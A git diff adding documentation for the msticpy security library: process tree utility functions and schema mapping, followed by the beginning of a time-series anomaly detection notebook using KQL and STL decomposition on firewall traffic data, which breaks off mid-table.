+.. container:: cell code
+
+   .. code:: python
+
+      # Read in and process some data - this contains a Rarity column indicating
+      # how common the process is in analyzed data set.
+      proc_rarity = pd.read_pickle("../demos/data/procs_with_cluster.pkl")
+      proc_rarity_tree = ptree.build_process_tree(proc_rarity, show_progress=True)
+
+   .. container:: output stream stdout
+
+      ::
+
+         {'Processes': 22992, 'RootProcesses': 31, 'LeafProcesses': 15587, 'BranchProcesses': 7374, 'IsolatedProcesses': 0, 'LargestTreeDepth': 839}
+
+.. container:: cell code
+
+   .. code:: python
+
+      # Get the root processes from the process tree data
+      prar_roots = ptree.get_roots(proc_rarity_tree)
+
+      # Find the tree with the highest Rarity Score and
+      # calculate the AverageRarity for proceses in that tree.
+      # NOTE: this code is only needed to help us choose likely trees to view
+      # it is not needed for the plotting.
+      tree_rarity = []
+      for row_num, (ix, row) in enumerate(prar_roots.iterrows()):
+          rarity_tree = ptree.get_descendents(proc_rarity_tree, row)
+          tree_rarity.append({
+              "Row": row_num,
+              "RootProcess": prar_roots.loc[ix].NewProcessName,
+              "TreeSize:": len(rarity_tree),
+              "AverageRarity": rarity_tree["Rarity"].mean()
+          })
+
+      pd.DataFrame(tree_rarity).sort_values("AverageRarity", ascending=False)
+
+   .. container:: output execute_result
+
+      ::
+
+             Row                                        RootProcess  TreeSize:
+         27   27                    C:\Windows\System32\svchost.exe          4
+         23   23                    C:\Windows\System32\svchost.exe          2
+         22   22                       C:\Windows\System32\smss.exe         30
+         20   20  C:\Windows\SoftwareDistribution\Download\Insta...          2
+         9     9                       C:\Windows\System32\smss.exe          7
+         7     7  C:\ProgramData\Microsoft\Windows Defender\plat...         46
+         ....
+
+
+.. container:: cell code
+
+   .. code:: python
+
+      # Plot the tree using the Rarity column as the legend_col parameter.
+      svcs_tree = ptree.get_descendents(proc_rarity_tree, prar_roots.iloc[22])
+      ptree.plot_process_tree(svcs_tree, legend_col="Rarity", show_table=True)
+
+.. figure:: _static/process_tree3.png
+   :alt: Process tree plot
+   :width: 5in
+   :height: 4in
+
+
+
+Process Tree utility Functions
+------------------------------
+
+
+The :py:mod:`process_tree_utils<msticpy.sectools.process_tree_utils>`
+module has a number of functions that may
+be useful in extracting or manipulating process trees or tree
+relationships.
+
+These typically take a ``procs`` parameter - the DataFrame containing
+the process trees.
+Processes that perform navigation relative to another process (get_parent,
+get_children, etc.) also take a ``source`` parameter - the process that is
+the origin of the navigation.
+
+Some functions also have an ``include_source`` parameter, e.g. get_children.
+This controls whether the function will include the source process in the results.
+
+Functions:
+
+-  :py:func:`build_process_key<msticpy.sectools.process_tree_utils.build_process_key>`
+-  :py:func:`build_process_tree<msticpy.sectools.process_tree_utils.build_process_tree>`
+-  :py:func:`get_ancestors<msticpy.sectools.process_tree_utils.get_ancestors>`
+-  :py:func:`get_children<msticpy.sectools.process_tree_utils.get_children>`
+-  :py:func:`get_descendents<msticpy.sectools.process_tree_utils.get_descendents>`
+-  :py:func:`get_parent<msticpy.sectools.process_tree_utils.get_parent>`
+-  :py:func:`get_process<msticpy.sectools.process_tree_utils.get_process>`
+-  :py:func:`get_process_key<msticpy.sectools.process_tree_utils.get_process_key>`
+-  :py:func:`get_root<msticpy.sectools.process_tree_utils.get_root>`
+-  :py:func:`get_root_tree<msticpy.sectools.process_tree_utils.get_root_tree>`
+-  :py:func:`get_roots<msticpy.sectools.process_tree_utils.get_roots>`
+-  :py:func:`get_siblings<msticpy.sectools.process_tree_utils.get_siblings>`
+-  :py:func:`get_summary_info<msticpy.sectools.process_tree_utils.get_summary_info>`
+-  :py:func:`get_tree_depth<msticpy.sectools.process_tree_utils.get_tree_depth>`
+-  :py:func:`infer_schema<msticpy.sectools.process_tree_utils.infer_schema>`
+
+
+:py:func:`~msticpy.sectools.process_tree_utils.get_summary_info`
+^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
+
+Get summary information.
+
+.. container:: cell code
+
+   .. code:: python
+
+      ptree.get_summary_info(p_tree_win)
+
+   .. container:: output execute_result
+
+      ::
+
+         {'Processes': 1010,
+          'RootProcesses': 10,
+          'LeafProcesses': 815,
+          'BranchProcesses': 185,
+          'IsolatedProcesses': 0,
+          'LargestTreeDepth': 7}
+
+:py:func:`~msticpy.sectools.process_tree_utils.get_roots`
+^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
+
+Get roots of all trees in the data set.
+
+.. container:: cell code
+
+   .. code:: python
+
+      # Get roots of all trees in the set
+      ptree.get_roots(p_tree_win).head()
+
+:py:func:`~msticpy.sectools.process_tree_utils.get_descendents`
+^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
+
+Get the full tree beneath a process.
+
+get_descendents takes an ``include_source`` parameter. Setting this to
+True returns the source process with the result set.
+
+.. container:: cell code
+
+   .. code:: python
+
+      # Take one of those roots and get the full tree beneath it
+      t_root = ptree.get_roots(p_tree_win).loc["c:\windowsazure\guestagent_2.7.41491.901_2019-01-14_202614\waappagent.exe0x19941970-01-01 00:00:00.000000"]
+      full_tree = ptree.get_descendents(p_tree_win, t_root)
+      full_tree.head()
+
+:py:func:`~msticpy.sectools.process_tree_utils.get_children`
+^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
+
+Get the immediate children of a process
+
+get_children takes an ``include_source`` parameter. Setting this to
+True returns the source process with the result set.
+
+.. container:: cell code
+
+   .. code:: python
+
+      # Just get the immediate children of the root process
+      children = ptree.get_children(p_tree_win, t_root)
+      children.head()
+
+
+:py:func:`~msticpy.sectools.process_tree_utils.get_tree_depth`
+^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
+
+Get the depth of a tree.
+
+.. container:: cell code
+
+   .. code:: python
+
+      # Get the depth of the full tree
+      depth = ptree.get_tree_depth(full_tree)
+      print(f"depth of tree is {depth}")
+
+   .. container:: output stream stdout
+
+      ::
+
+         depth of tree is 4
+
+:py:func:`~msticpy.sectools.process_tree_utils.get_parent`
+^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
+
+:py:func:`~msticpy.sectools.process_tree_utils.get_ancestors`
+^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
+
+
+Get the parent process or all ancestors.
+
+get_ancestors takes an ``include_source`` parameter. Setting this to
+True returns the source process with the result set.
+
+.. container:: cell code
+
+   .. code:: python
+
+      # Get Ancestors
+      # Get a child process that's at the bottom of the tree
+      btm_descnt = full_tree[full_tree["path"].str.count("/") == depth - 1].iloc[0]
+
+      print("parent")
+      display(ptree.get_parent(p_tree_win, btm_descnt)[:20])
+      print("ancestors")
+      ptree.get_ancestors(p_tree_win, btm_descnt).head()
+
+   .. container:: output stream stdout
+
+      ::
+
+         parent
+
+
+         TenantId                           52b1ab41-869e-4138-9e40-2a4457f09bf0
+         Account                                      WORKGROUP\MSTICAlertsWin1$
+         EventID                                                            4688
+         TimeGenerated                                2019-02-09 23:20:15.547000
+         Computer                                                MSTICAlertsWin1
+         SubjectUserSid                                                 S-1-5-18
+         SubjectUserName                                        MSTICAlertsWin1$
+         SubjectDomainName                                             WORKGROUP
+         SubjectLogonId                                                    0x3e7
+         NewProcessId                                                      0xccc
+         NewProcessName                              C:\Windows\System32\cmd.exe
+         TokenElevationType                                               %%1936
+         ProcessId                                                        0x123c
+         CommandLine                                                       "cmd"
+         ParentProcessName     C:\WindowsAzure\GuestAgent_2.7.41491.901_2019-...
+         TargetLogonId                                                       0x0
+         SourceComputerId                   263a788b-6526-4cdc-8ed9-d79402fe4aa0
+         TimeCreatedUtc                               2019-02-09 23:20:15.547000
+         EffectiveLogonId                                                  0x3e7
+         new_process_lc                              c:\windows\system32\cmd.exe
+         Name: c:\windows\system32\cmd.exe0xccc2019-02-09 23:20:15.547000, dtype: object
+
+   .. container:: output stream stdout
+
+      ::
+
+         ancestors
+
+                                                                                         TenantId  \
+         proc_key
+         c:\windowsazure\guestagent_2.7.41491.901_2019-0...  52b1ab41-869e-4138-9e40-2a4457f09bf0
+         c:\windowsazure\guestagent_2.7.41491.901_2019-0...  52b1ab41-869e-4138-9e40-2a4457f09bf0
+         c:\windows\system32\cmd.exe0xccc2019-02-09 23:2...  52b1ab41-869e-4138-9e40-2a4457f09bf0
+         c:\windows\system32\conhost.exe0x14ec2019-02-09...  52b1ab41-869e-4138-9e40-2a4457f09bf0
+
+         ....
+
+         [4 rows x 35 columns]
+
+:py:func:`~msticpy.sectools.process_tree_utils.get_process`
+^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
+
+get_process retrieves a process record by its key. The process returned
+is a single row - a pandas Series.
+
+.. container:: cell code
+
+   .. code:: python
+
+      proc_key = btm_descnt.name
+      print(proc_key)
+      ptree.get_process(p_tree_win, proc_key)
+
+   .. container:: output stream stdout
+
+      ::
+
+         c:\windows\system32\conhost.exe0x14ec2019-02-09 23:20:15.560000
+
+   .. code:: python
+
+      process2 = full_tree[full_tree["path"].str.count("/") == depth - 1].iloc[-1]
+      ptree.build_process_key(process2)
+
+   .. container:: output execute_result
+
+      ::
+
+         'c:\\windows\\system32\\conhost.exe0x15842019-02-10 15:24:56.050000'
+
+:py:func:`~msticpy.sectools.process_tree_utils.get_siblings`
+^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
+
+Get the siblings of a process.
+
+get_siblings takes an ``include_source`` parameter. Setting this to
+True returns the source process with the result set.
+
+.. container:: cell code
+
+   .. code:: python
+
+      src_proc = ptree.get_children(p_tree_win, t_root, include_source=False).iloc[0]
+      ptree.get_siblings(p_tree_win, src_proc, include_source=True).head()
+
+   .. container:: output execute_result
+
+      ::
+
+                                                                                         TenantId  \
+         proc_key
+         c:\windowsazure\guestagent_2.7.41491.901_2019-0...  52b1ab41-869e-4138-9e40-2a4457f09bf0
+         c:\windowsazure\guestagent_2.7.41491.901_2019-0...  52b1ab41-869e-4138-9e40-2a4457f09bf0
+         c:\windowsazure\secagent\wasecagentprov.exe0xda...  52b1ab41-869e-4138-9e40-2a4457f09bf0
+         ...
+
+         [5 rows x 35 columns]
+
+
+Create a network from a Tree using Networkx
+-------------------------------------------
+
+.. container:: cell code
+
+   .. code:: python
+
+      import networkx as nx
+      import matplotlib.pyplot as plt
+      p_graph = nx.DiGraph()
+
+      p_graph = nx.from_pandas_edgelist(
+          df=full_tree.reset_index(),
+          source="parent_key",
+          target="proc_key",
+          edge_attr=["TimeGenerated", "NewProcessName", "NewProcessId"],
+          create_using=nx.DiGraph,
+      )
+
+      plt.gcf().set_size_inches((20,20))
+      pos = nx.circular_layout(p_graph)
+      nx.draw_networkx(p_graph, pos=pos, with_labels=False, node_size=50, fig_size=(10,10))
+      # Get the root binary name to plot labels (change the split param for Linux)
+      labels = full_tree.apply(lambda x: x.NewProcessName.split("\\")[-1], axis=1).to_dict()
+      nx.draw_networkx_labels(p_graph, pos, labels=labels, font_size=10, font_color='k', font_family='sans-serif', font_weight='normal', alpha=1.0)
+      plt.show()
+
+
+.. figure:: _static/process_tree4.png
+   :alt: Networkx plot of process tree
+   :width: 4in
+   :height: 4in
+
+
+Adapting the input schema of your data
+--------------------------------------
+
+The process tree builder uses generic names to map common event
+properties such as process name and process ID between different
+input schemas.
+
+The built-in schemas for Windows 4688, Linux Auditd and Microsoft Defender
+are shown below.
+
+===================  =====================  =====================  ===========================
+Generic name         Win 4688 schema        Linux auditd schema    MDE schema
+===================  =====================  =====================  ===========================
+time_stamp           TimeGenerated          TimeGenerated          CreatedProcessCreationTime
+process_name         NewProcessName         exe                    CreatedProcessName
+process_id           NewProcessId           pid                    CreatedProcessId
+parent_name          ParentProcessName      *(not used)*           ParentProcessName
+parent_id            ProcessId              ppid                   CreatedProcessParentId
+logon_id             SubjectLogonId         ses                    InitiatingProcessLogonId
+target_logon_id      TargetLogonId          *(not used)*           LogonId
+cmd_line             CommandLine            cmdline                CreatedProcessCommandLine
+user_name            SubjectUserName        acct                   CreatedProcessAccountName
+user_id              SubjectUserSid         uid                    CreatedProcessAccountSid
+host_name_column     Computer               Computer               ComputerDnsName
+event_id_column      EventID                EventType              *(not used)*
+===================  =====================  =====================  ===========================
+
+
+If your schema differs from, but is similar to one of the built-in
+schema mappings you can adapt one of these or supply a custom schema
+when you build and display the process tree.
+
+There are also two schema properties that you might need to
+add to the schema.
+
+===================  =====================  =====================  =====================
+Mapping property     Win 4688 schema        Linux auditd schema    MDE schema
+===================  =====================  =====================  =====================
+path_separator       ``\\``                 ``/``                  ``\\``
+event_id_identifier  4688*                  SYSCALL_EXECVE         *(not used)*
+===================  =====================  =====================  =====================
+
+\*The event_id_identifier for Windows 4688 schema must be an integer.
+
+The path_separator value is used to extract the process file name (minus
+the path) in the process tree view.
+
+The ``event_id_column`` and ``event_id_identifier`` work together and are useful if your
+input data contains mixed event types. Using these together will tell
+the process tree builder to filter on events where event_id_column == event_id_identifier.
+E.g. ``data[data["EventID"] == 4688]``
+
+The example below
+shows how to adapt an existing Linux schema for different column
+names in the source schema.
+
+.. code:: ipython
+
+   from msticpy.sectools.proc_tree_builder import LX_EVENT_SCH
+   # also WIN_EVENT_SCH and MDE_EVENT_SCH are available
+   from copy import copy
+   cust_lx_schema = copy(LX_EVENT_SCH)
+
+   cust_lx_schema.time_stamp = "TimeStamp"
+   cust_lx_schema.host_name_column = "host"
+   # Note these are used to filter events if you have a data
+   # set that contains mixed event types.
+   cust_lx_schema.event_id_column = None
+   cust_lx_schema.event_id_identifier = None
+
+   # now supply the schema as the schema parameter
+   ptree.build_process_tree(auditd_df, schema=cust_lx_schema)
+
+You can also supply a schema as a Python ``dict``, with the keys
+being the generic internal name and the values, the names of the columns
+in the input data. Both keys and values are strings except where
+otherwise indicated above.
+
+The ``time_stamp`` column **must** be a pandas Timestamp (Python datetime)
+type. If your data is in another format (e.g. Unix timestamp or date string)
+you should
+convert this before trying to use the process tree tools. The example
+below shows extracting the timestamp from the auditd ``mssg_id`` field.
+
+
+.. code:: ipython
+
+   linux_proc["ts"] = pd.to_numeric(linux_proc["mssg_id"].apply(lambda x: x.split(":")[0]))
+   # the "ts" column is now a fixed-point number
+   # Convert to a pandas timestamp.
+   linux_proc["time_stamp"] = pd.to_datetime(linux_proc.ts, utc=True)
+
+   # set the converted column as your time_stamp column.
+   cust_lx_schema.time_stamp = "time_stamp"
\ No newline at end of file
diff --git a/docs/source/visualization/TimeSeriesAnomalies.rst b/docs/source/visualization/TimeSeriesAnomalies.rst
new file mode 100644
index 000000000..9acc019ac
--- /dev/null
+++ b/docs/source/visualization/TimeSeriesAnomalies.rst
@@ -0,0 +1,1146 @@
+Time Series Analysis and Anomalies Visualization
+================================================
+
+This notebook demonstrates the time series analysis and anomalies
+visualization built using the `Bokeh
+library <https://bokeh.pydata.org>`__ as well as using built-in native
+KQL operators.
+
+Time Series analysis generally involves below steps
+ - Generating TimeSeries Data
+ - Use Time Series Analysis functions to discover anomalies
+ - Visualize Time Series anomalies
+
+Read more about time series analysis in detail from reference microsoft
+TechCommunity blog posts
+
+**Reference Blog Posts:**
+
+- `Looking for unknown anomalies - what is normal? Time Series analysis & its applications in Security <https://techcommunity.microsoft.com/t5/azure-sentinel/looking-for-unknown-anomalies-what-is-normal-time-series/ba-p/555052>`__
+
+- `Time Series visualization of Palo Alto logs to detect data exfiltration <https://techcommunity.microsoft.com/t5/azure-sentinel/time-series-visualization-of-palo-alto-logs-to-detect-data/ba-p/666344>`__
+
+.. code:: ipython3
+
+    # Imports
+    import sys
+    import warnings
+
+    from msticpy.common.utility import check_py_version
+
+    MIN_REQ_PYTHON = (3, 6)
+    check_py_version(MIN_REQ_PYTHON)
+
+    from IPython import get_ipython
+    from IPython.display import display, HTML, Markdown
+    import ipywidgets as widgets
+
+    import pandas as pd
+
+    #setting pandas display options for dataframe
+    pd.set_option("display.max_rows", 100)
+    pd.set_option("display.max_columns", 50)
+    pd.set_option("display.max_colwidth", 100)
+
+    # msticpy imports
+    from msticpy.data import QueryProvider
+    from msticpy.nbtools import *
+    from msticpy.sectools import *
+    from msticpy.nbtools.wsconfig import WorkspaceConfig
+    from msticpy.nbtools.timeseries import display_timeseries_anomolies
+
+    WIDGET_DEFAULTS = {
+        "layout": widgets.Layout(width="95%"),
+        "style": {"description_width": "initial"},
+    }
+
+    #Adjusting width of the screen
+    display(HTML("<style>.container { width:80% !important; }</style>"))
+
+    ws_config = WorkspaceConfig()
+
+
+.. code:: ipython3
+
+    # Authentication
+    qry_prov = QueryProvider(data_environment="LogAnalytics")
+    qry_prov.connect(connection_str=ws_config.code_connect_str)
+
+Generating Time Series Data
+---------------------------
+
+Time Series is a series of data points indexed (or listed or graphed) in
+time order. The data points are often discrete numeric points such as
+frequency of counts or occurrences against a timestamp column of the
+dataset
+
+Using LogAnalytics Query Provider
+^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
+
+msticpy has a QueryProvider through which you can connect to LogAnalytics
+Data environment. via ``QueryProvider(data_environment="LogAnalytics")``
+Once you connect to data environment (``qry_prov.connect()``), you can
+list the available queries (``qry_prov.list_queries()``) for the data
+environment which in this case is LogAnalytics.
+
+Displaying available timeseries queries
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+For this notebook, we are interested in time series queries only, so we
+will filter and display only those.
+
+.. code:: ipython3
+
+    queries = qry_prov.list_queries()
+    for query in queries:
+        if "timeseries" in query:
+            print(query)
+
+
+.. parsed-literal::
+
+    MultiDataSource.get_timeseries_anomalies
+    MultiDataSource.get_timeseries_data
+    MultiDataSource.get_timeseries_decompose
+    MultiDataSource.plot_timeseries_datawithbaseline
+    MultiDataSource.plot_timeseries_scoreanomolies
+
+
+Get TimeSeries Data from LogAnalytics Table
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+You can get more details about the individual query by executing
+``qry_prov.MultiDataSource.get_timeseries_data('?')`` which will display
+Query, data source, parameters and parameterized raw KQL query
+
+::
+
+    Query:  get_timeseries_data
+    Data source:  LogAnalytics
+    Retrieves TimeSeriesData prepared to use with built-in KQL time series functions
+
+    Parameters
+    ----------
+    add_query_items: str (optional)
+        Additional query clauses
+    aggregatecolumn: str (optional)
+        field to agregate from source dataset
+        (default value is: Total)
+    aggregatefunction: str (optional)
+        Aggregation functions to use - count(), sum(), avg() etc
+        (default value is: count())
+    end: datetime
+        Query end time
+    groupbycolumn: str (optional)
+        Group by field to aggregate results
+        (default value is: Type)
+    scorethreshold: str (optional)
+        Score threshold for alerting
+        (default value is: 3)
+    start: datetime
+        Query start time
+    table: str
+        Table name
+    timeframe: str (optional)
+        Aggregation TimeFrame
+        (default value is: 1h)
+    timestampcolumn: str (optional)
+        Timestamp field to use from source dataset
+        (default value is: TimeGenerated)
+    where_clause: str (optional)
+        Optional additional filter clauses
+    Query:
+    {table} {where_clause} | project {timestampcolumn},{aggregatecolumn},{groupbycolumn} | where {timestampcolumn} >= datetime({start}) | where {timestampcolumn} <= datetime({end}) | make-series {aggregatecolumn}={aggregatefunction} on {timestampcolumn} from datetime({start}) to datetime({end}) step {timeframe} by {groupbycolumn} {add_query_items}
+
+.. code:: ipython3
+
+    #Specify start and end timestamps
+    start='2020-02-09 00:00:00.000000'
+    end='2020-03-10 00:00:00.000000'
+    #Execute the query by passing required and optional parameters
+    time_series_data = qry_prov.MultiDataSource.get_timeseries_data(
+    start=start,
+    end=end,
+    table="CommonSecurityLog",
+    timestampcolumn="TimeGenerated",
+    aggregatecolumn="SentBytes",
+    groupbycolumn="DeviceVendor",
+    aggregatefunction="sum(SentBytes)",
+    where_clause='|where DeviceVendor=="Palo Alto Networks"',
+    add_query_items='|mv-expand TimeGenerated to typeof(datetime), SentBytes to typeof(long)',
+    )
+    #display the output
+    time_series_data
+
+
+.. raw:: html
+
+    <div>
+    <style scoped>
+        .dataframe tbody tr th:only-of-type {
+            vertical-align: middle;
+        }
+
+        .dataframe tbody tr th {
+            vertical-align: top;
+        }
+
+        .dataframe thead th {
+            text-align: right;
+        }
+    </style>
+    <table border="1" class="dataframe">
+      <thead>
+        <tr style="text-align: right;">
+          <th></th>
+          <th>DeviceVendor</th>
+          <th>SentBytes</th>
+          <th>TimeGenerated</th>
+        </tr>
+      </thead>
+      <tbody>
+        <tr>
+          <th>0</th>
+          <td>Palo Alto Networks</td>
+          <td>[2169225531, 2157438780, 2190010184, 2312862664, 2173326723, 2205690775, 2134192633, 2289092642,...</td>
+          <td>[2020-02-09T00:00:00.0000000Z, 2020-02-09T01:00:00.0000000Z, 2020-02-09T02:00:00.0000000Z, 2020-...</td>
+        </tr>
+      </tbody>
+    </table>
+    </div>
+
+|
+
+Time Series Analysis and discovering Anomalies
+----------------------------------------------
+
+By analyzing time series data over an extended period, we can identify
+time-based patterns (e.g. seasonality, trend etc.) in the data and
+extract meaningful statistics which can help in flagging outliers. A
+particular example in a security context is user logon patterns over a
+period of time exhibiting different behavior after hours and on
+weekends: computing deviations from these changing patterns is rather
+difficult in traditional atomic detections with static thresholds. KQL
+built-in functions can automatically identify such seasonality and trend
+from the input data and take it into consideration when flagging
+anomalies.
+
+Using Built-in KQL to generate TimeSeries decomposition
+^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
+
+In this case, we will use built-in KQL function ``series_decompose()``
+to decompose time series to generate additional data points such as
+baseline, seasonal , trend etc.
+
+**KQL Reference Documentation:** -
+`series_decompose <https://docs.microsoft.com/azure/kusto/query/series-decomposefunction>`__
+
+You can use available query
+``qry_prov.MultiDataSource.plot_timeseries_datawithbaseline()`` to get
+the similar details
+
+::
+
+   Query:  plot_timeseries_datawithbaseline
+   Data source:  LogAnalytics
+   Plot timeseries data using built-in KQL time series decomposition using built-in KQL render method
+
+   Parameters
+   ----------
+   aggregatecolumn: str (optional)
+       field to agregate from source dataset
+       (default value is: Total)
+   aggregatefunction: str (optional)
+       Aggregation functions to use - count(), sum(), avg() etc
+       (default value is: count())
+   end: datetime
+       Query end time
+   groupbycolumn: str (optional)
+       Group by field to aggregate results
+       (default value is: Type)
+   scorethreshold: str (optional)
+       Score threshold for alerting
+       (default value is: 3)
+   start: datetime
+       Query start time
+   table: str
+       Table name
+   timeframe: str (optional)
+       Aggregation TimeFrame
+       (default value is: 1h)
+   timestampcolumn: str (optional)
+       Timestamp field to use from source dataset
+       (default value is: TimeGenerated)
+   where_clause: str (optional)
+       Optional additional filter clauses
+   Query:
+    {table} {where_clause} | project {timestampcolumn},{aggregatecolumn},{groupbycolumn}
+    | where {timestampcolumn} >= datetime({start}) | where {timestampcolumn} <= datetime({end})
+    | make-series {aggregatecolumn}={aggregatefunction} on {timestampcolumn}
+      from datetime({start}) to datetime({end}) step {timeframe} by {groupbycolumn}
+    | extend (baseline,seasonal,trend,residual) = series_decompose({aggregatecolumn})
+    | mv-expand {aggregatecolumn} to typeof(double), {timestampcolumn} to typeof(datetime),
+      baseline to typeof(long), seasonal to typeof(long), trend to typeof(long), residual to typeof(long)
+    | project {timestampcolumn}, {aggregatecolumn}, baseline
+    | render timechart with (title="Time Series Decomposition - Baseline vs Observed TimeChart")
+
+.. code:: ipython3
+
+    time_series_baseline = qry_prov.MultiDataSource.plot_timeseries_datawithbaseline(
+        start=start,
+        end=end,
+        table='CommonSecurityLog',
+        timestampcolumn='TimeGenerated',
+        aggregatecolumn='SentBytes',
+        groupbycolumn='DeviceVendor',
+        aggregatefunction='sum(SentBytes)',
+        scorethreshold='1.5',
+        where_clause='|where DeviceVendor=="Palo Alto Networks"'
+    )
+    time_series_baseline.head()
+
+
+
+
+.. raw:: html
+
+    <div>
+    <style scoped>
+        .dataframe tbody tr th:only-of-type {
+            vertical-align: middle;
+        }
+
+        .dataframe tbody tr th {
+            vertical-align: top;
+        }
+
+        .dataframe thead th {
+            text-align: right;
+        }
+    </style>
+    <table border="1" class="dataframe">
+      <thead>
+        <tr style="text-align: right;">
+          <th></th>
+          <th>TimeGenerated</th>
+          <th>SentBytes</th>
+          <th>baseline</th>
+        </tr>
+      </thead>
+      <tbody>
+        <tr>
+          <th>0</th>
+          <td>2020-02-09 00:00:00</td>
+          <td>2.169226e+09</td>
+          <td>2205982717</td>
+        </tr>
+        <tr>
+          <th>1</th>
+          <td>2020-02-09 01:00:00</td>
+          <td>2.157439e+09</td>
+          <td>2205982717</td>
+        </tr>
+        <tr>
+          <th>2</th>
+          <td>2020-02-09 02:00:00</td>
+          <td>2.190010e+09</td>
+          <td>2205982717</td>
+        </tr>
+        <tr>
+          <th>3</th>
+          <td>2020-02-09 03:00:00</td>
+          <td>2.312863e+09</td>
+          <td>2205982717</td>
+        </tr>
+        <tr>
+          <th>4</th>
+          <td>2020-02-09 04:00:00</td>
+          <td>2.173327e+09</td>
+          <td>2205982717</td>
+        </tr>
+      </tbody>
+    </table>
+    </div>
+
+|
+
+Using MSTICPY - Seasonal-Trend decomposition using LOESS (STL)
+^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
+
+In this case, we will use msticpy function `timeseries_anomalies_stl`
+which leverages `STL` method from `statsmodels` API to decompose a time
+series into three components: trend, seasonal and residual. STL uses
+LOESS (locally estimated scatterplot smoothing) to extract smooths
+estimates of the three components. The key inputs into STL are:
+
+- season - The length of the seasonal smoother. Must be odd.
+- trend - The length of the trend smoother, usually around 150%
+  of season. Must be odd and larger than season.
+- low_pass - The length of the low-pass estimation window, usually the
+  smallest odd number larger than the periodicity of the data.
+
+More info at the
+`statsmodel STL documentation
+<https://www.statsmodels.org/dev/generated/statsmodels.tsa.seasonal.STL.html#statsmodels.tsa.seasonal.STL>`__
+
+Documentation of timeseries_anomalies_stl function
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+::
+
+  timeseries_anomalies_stl(data: pandas.core.frame.DataFrame, **kwargs) -> pandas.core.frame.DataFrame
+      Discover anomalies in Timeseries data using
+      STL (Seasonal-Trend Decomposition using LOESS) method using statsmodels package.
+
+      Parameters
+      ----------
+      data: pd.DataFrame
+          DataFrame as a time series data set retrived from data connector or external data source.
+          Dataframe must have 2 columns with time column set as index and other numeric value.
+
+      Other Parameters
+      ----------------
+      seasonal: int, optional
+          Seasonality period of the input data required for STL.
+          Must be an odd integer, and should normally be >= 7 (default).
+      period: int, optional
+          Periodicity of the the input data. by default 24 (Hourly).
+      score_threshold: float, optional
+          standard deviation threshold value calculated using Z-score used to flag anomalies,
+          by default 3
+
+      Returns
+      -------
+      pd.DataFrame
+          Returns a dataframe with additional columns by decomposing time series data
+          into residual, trend, seasonal, weights, baseline, score and anomalies.
+          The anomalies column will have 0, 1, -1 values based on score_threshold set.
+
+.. code:: ipython3
+
+    # Read Time series data with date as index and other column
+    stldemo = pd.read_csv(
+        "data/TimeSeriesDemo.csv", index_col=["TimeGenerated"], usecols=["TimeGenerated","TotalBytesSent"])
+    stldemo.head()
+
+.. raw:: html
+
+    <div>
+    <style scoped>
+        .dataframe tbody tr th:only-of-type {
+            vertical-align: middle;
+        }
+
+        .dataframe tbody tr th {
+            vertical-align: top;
+        }
+
+        .dataframe thead th {
+            text-align: right;
+        }
+    </style>
+    <table border="1" class="dataframe">
+      <thead>
+        <tr style="text-align: right;">
+          <th></th>
+          <th>TotalBytesSent</th>
+        </tr>
+        <tr>
+          <th>TimeGenerated</th>
+          <th></th>
+        </tr>
+      </thead>
+      <tbody>
+        <tr>
+          <th>2019-05-01T06:00:00Z</th>
+          <td>873713587</td>
+        </tr>
+        <tr>
+          <th>2019-05-01T07:00:00Z</th>
+          <td>882187669</td>
+        </tr>
+        <tr>
+          <th>2019-05-01T08:00:00Z</th>
+          <td>852506841</td>
+        </tr>
+        <tr>
+          <th>2019-05-01T09:00:00Z</th>
+          <td>898793650</td>
+        </tr>
+        <tr>
+          <th>2019-05-01T10:00:00Z</th>
+          <td>891598085</td>
+        </tr>
+      </tbody>
+    </table>
+    </div>
+
+|
+
+Discover anomalies using timeseries_anomalies_stl function
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+We will run msticpy function `timeseries_anomalies_stl` on the input data to discover anomalies.
+
+.. code:: ipython3
+
+    output = timeseries_anomalies_stl(stldemo)
+    output.head()
+
+.. raw:: html
+
+    <div>
+    <style scoped>
+        .dataframe tbody tr th:only-of-type {
+            vertical-align: middle;
+        }
+
+        .dataframe tbody tr th {
+            vertical-align: top;
+        }
+
+        .dataframe thead th {
+            text-align: right;
+        }
+    </style>
+    <table border="1" class="dataframe">
+      <thead>
+        <tr style="text-align: right;">
+          <th></th>
+          <th>TimeGenerated</th>
+          <th>TotalBytesSent</th>
+          <th>residual</th>
+          <th>trend</th>
+          <th>seasonal</th>
+          <th>weights</th>
+          <th>baseline</th>
+          <th>score</th>
+          <th>anomalies</th>
+        </tr>
+      </thead>
+      <tbody>
+        <tr>
+          <th>0</th>
+          <td>2019-05-01T06:00:00Z</td>
+          <td>873713587</td>
+          <td>-7258970</td>
+          <td>786685528</td>
+          <td>94287029</td>
+          <td>1</td>
+          <td>880972557</td>
+          <td>-0.097114</td>
+          <td>0</td>
+        </tr>
+        <tr>
+          <th>1</th>
+          <td>2019-05-01T07:00:00Z</td>
+          <td>882187669</td>
